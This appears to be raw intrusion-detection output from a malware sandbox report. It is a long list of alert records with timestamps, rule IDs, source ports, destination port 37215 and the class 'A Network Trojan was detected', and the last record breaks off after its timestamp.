          Timestamp:06/09/24-16:33:23.480759
          SID:2829579
          Source Port:47450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.017523
          SID:2829579
          Source Port:55388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.132227
          SID:2829579
          Source Port:36262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718266
          SID:2829579
          Source Port:44968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.900158
          SID:2829579
          Source Port:44260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.291307
          SID:2835222
          Source Port:34568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719442
          SID:2835222
          Source Port:37592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.095884
          SID:2829579
          Source Port:56756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558976
          SID:2829579
          Source Port:50430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.298327
          SID:2829579
          Source Port:44458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.694671
          SID:2835222
          Source Port:56066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224052
          SID:2835222
          Source Port:57394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162333
          SID:2829579
          Source Port:41974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.602010
          SID:2835222
          Source Port:45228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078069
          SID:2829579
          Source Port:51124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869172
          SID:2835222
          Source Port:45194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719762
          SID:2829579
          Source Port:49908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.130602
          SID:2835222
          Source Port:59368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.471434
          SID:2829579
          Source Port:37470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.606884
          SID:2829579
          Source Port:48720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.991369
          SID:2835222
          Source Port:42452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539586
          SID:2835222
          Source Port:57088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931395
          SID:2835222
          Source Port:35152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.416358
          SID:2829579
          Source Port:48360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.658376
          SID:2835222
          Source Port:52932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223726
          SID:2835222
          Source Port:35806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715056
          SID:2829579
          Source Port:54800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081844
          SID:2829579
          Source Port:38098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643856
          SID:2829579
          Source Port:49380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.075787
          SID:2829579
          Source Port:52836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.082999
          SID:2829579
          Source Port:60646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.157726
          SID:2829579
          Source Port:57346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163218
          SID:2835222
          Source Port:56584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929604
          SID:2829579
          Source Port:54688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.921114
          SID:2835222
          Source Port:53354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865752
          SID:2835222
          Source Port:52550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.644882
          SID:2829579
          Source Port:37076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.419621
          SID:2829579
          Source Port:58458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226808
          SID:2835222
          Source Port:57058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819922
          SID:2829579
          Source Port:54978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719529
          SID:2829579
          Source Port:36542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081654
          SID:2829579
          Source Port:38932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947743
          SID:2835222
          Source Port:57650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.667807
          SID:2829579
          Source Port:38820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396353
          SID:2835222
          Source Port:33942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926826
          SID:2829579
          Source Port:33812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.032814
          SID:2829579
          Source Port:59740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.479009
          SID:2835222
          Source Port:48806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718953
          SID:2835222
          Source Port:45494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.660693
          SID:2835222
          Source Port:35636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413217
          SID:2835222
          Source Port:59230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.559127
          SID:2835222
          Source Port:33854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.271157
          SID:2835222
          Source Port:43972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643539
          SID:2835222
          Source Port:34434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415434
          SID:2829579
          Source Port:41270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539552
          SID:2829579
          Source Port:47096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.242330
          SID:2835222
          Source Port:60374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.922166
          SID:2829579
          Source Port:54226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286996
          SID:2835222
          Source Port:60300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033626
          SID:2829579
          Source Port:41996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867252
          SID:2835222
          Source Port:45782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.074654
          SID:2829579
          Source Port:58890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396372
          SID:2829579
          Source Port:44366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716697
          SID:2835222
          Source Port:46962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718724
          SID:2829579
          Source Port:45558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.603854
          SID:2835222
          Source Port:35470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035928
          SID:2835222
          Source Port:50782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.252204
          SID:2835222
          Source Port:55440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.910652
          SID:2835222
          Source Port:46738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.477526
          SID:2829579
          Source Port:48570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.400252
          SID:2829579
          Source Port:59696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.294637
          SID:2835222
          Source Port:50198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.294755
          SID:2829579
          Source Port:34860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.895749
          SID:2835222
          Source Port:56884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.089611
          SID:2829579
          Source Port:39522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987384
          SID:2835222
          Source Port:46954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929842
          SID:2835222
          Source Port:40556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.930315
          SID:2835222
          Source Port:56256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472502
          SID:2835222
          Source Port:37844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.156717
          SID:2835222
          Source Port:39648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820232
          SID:2829579
          Source Port:41476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.949956
          SID:2835222
          Source Port:42500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.861017
          SID:2835222
          Source Port:56274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.601873
          SID:2829579
          Source Port:38722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.283200
          SID:2829579
          Source Port:43868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.287914
          SID:2829579
          Source Port:34078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987868
          SID:2829579
          Source Port:36644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418335
          SID:2835222
          Source Port:50612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721655
          SID:2829579
          Source Port:33734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.948276
          SID:2835222
          Source Port:56864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168353
          SID:2829579
          Source Port:40578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.086483
          SID:2829579
          Source Port:41814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538163
          SID:2835222
          Source Port:59516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168894
          SID:2835222
          Source Port:57652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.249405
          SID:2829579
          Source Port:40834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819176
          SID:2835222
          Source Port:45814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033525
          SID:2829579
          Source Port:56064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945220
          SID:2835222
          Source Port:38626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028740
          SID:2829579
          Source Port:59932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396087
          SID:2829579
          Source Port:54120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.891222
          SID:2835222
          Source Port:45460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081066
          SID:2829579
          Source Port:53000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.246065
          SID:2835222
          Source Port:57228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206824
          SID:2829579
          Source Port:53752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.249473
          SID:2835222
          Source Port:38856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.280690
          SID:2835222
          Source Port:34716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.862710
          SID:2829579
          Source Port:55168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163785
          SID:2835222
          Source Port:56452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.159358
          SID:2829579
          Source Port:54876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.167947
          SID:2829579
          Source Port:46000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987947
          SID:2829579
          Source Port:47620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.696376
          SID:2835222
          Source Port:46648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206206
          SID:2829579
          Source Port:57386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926134
          SID:2829579
          Source Port:58214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205366
          SID:2835222
          Source Port:33064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720789
          SID:2829579
          Source Port:47698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.243989
          SID:2829579
          Source Port:35060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.490119
          SID:2835222
          Source Port:47316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.668717
          SID:2829579
          Source Port:49462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.596848
          SID:2829579
          Source Port:58000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224487
          SID:2829579
          Source Port:45004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418272
          SID:2829579
          Source Port:36866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.074615
          SID:2835222
          Source Port:54864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038874
          SID:2829579
          Source Port:47706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.274521
          SID:2829579
          Source Port:38774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104389
          SID:2829579
          Source Port:41264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.274233
          SID:2835222
          Source Port:49862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.247268
          SID:2829579
          Source Port:52818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.468424
          SID:2829579
          Source Port:56808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.559774
          SID:2835222
          Source Port:38740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.660439
          SID:2835222
          Source Port:49590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948573
          SID:2829579
          Source Port:48446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.030663
          SID:2829579
          Source Port:59536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.740998
          SID:2829579
          Source Port:57606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035798
          SID:2835222
          Source Port:36424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.032639
          SID:2835222
          Source Port:58962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.037931
          SID:2835222
          Source Port:52466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.244741
          SID:2829579
          Source Port:37618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718931
          SID:2835222
          Source Port:36254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.251341
          SID:2835222
          Source Port:43452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226807
          SID:2835222
          Source Port:36804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.862641
          SID:2829579
          Source Port:57688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557142
          SID:2829579
          Source Port:55202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.987024
          SID:2835222
          Source Port:41412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.270013
          SID:2829579
          Source Port:33622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397286
          SID:2829579
          Source Port:46200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.892659
          SID:2835222
          Source Port:38428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818297
          SID:2829579
          Source Port:43188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.476131
          SID:2829579
          Source Port:36436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.646376
          SID:2829579
          Source Port:53564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.008618
          SID:2829579
          Source Port:32902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248691
          SID:2829579
          Source Port:35844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396543
          SID:2829579
          Source Port:42746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.162922
          SID:2829579
          Source Port:36482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.029198
          SID:2835222
          Source Port:46680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.634945
          SID:2829579
          Source Port:38438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225048
          SID:2835222
          Source Port:45988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.000434
          SID:2835222
          Source Port:58680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226948
          SID:2829579
          Source Port:49582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.687647
          SID:2829579
          Source Port:53246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.296818
          SID:2829579
          Source Port:37912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.660835
          SID:2829579
          Source Port:33638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418866
          SID:2835222
          Source Port:57782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928908
          SID:2829579
          Source Port:51812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081802
          SID:2835222
          Source Port:53036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.891157
          SID:2829579
          Source Port:45458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713472
          SID:2835222
          Source Port:41450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224663
          SID:2829579
          Source Port:33762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413622
          SID:2829579
          Source Port:37594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.075021
          SID:2829579
          Source Port:60984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948533
          SID:2835222
          Source Port:56948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.165654
          SID:2829579
          Source Port:59222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.476648
          SID:2835222
          Source Port:54122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538144
          SID:2835222
          Source Port:56560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396754
          SID:2835222
          Source Port:32904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227858
          SID:2829579
          Source Port:46446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.125243
          SID:2835222
          Source Port:39538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.902334
          SID:2829579
          Source Port:58652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819251
          SID:2835222
          Source Port:60124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.471938
          SID:2829579
          Source Port:41080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.283225
          SID:2829579
          Source Port:55232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718152
          SID:2835222
          Source Port:43542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284804
          SID:2835222
          Source Port:43050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.075135
          SID:2835222
          Source Port:43828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225763
          SID:2835222
          Source Port:40650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288546
          SID:2835222
          Source Port:35534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644824
          SID:2829579
          Source Port:60948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.466264
          SID:2835222
          Source Port:43032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718845
          SID:2835222
          Source Port:49262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538062
          SID:2835222
          Source Port:37466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.169013
          SID:2829579
          Source Port:41712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415076
          SID:2835222
          Source Port:42790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.291307
          SID:2829579
          Source Port:57570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819241
          SID:2835222
          Source Port:34526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.134734
          SID:2829579
          Source Port:55648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.029307
          SID:2829579
          Source Port:48058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.597212
          SID:2829579
          Source Port:45736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.922941
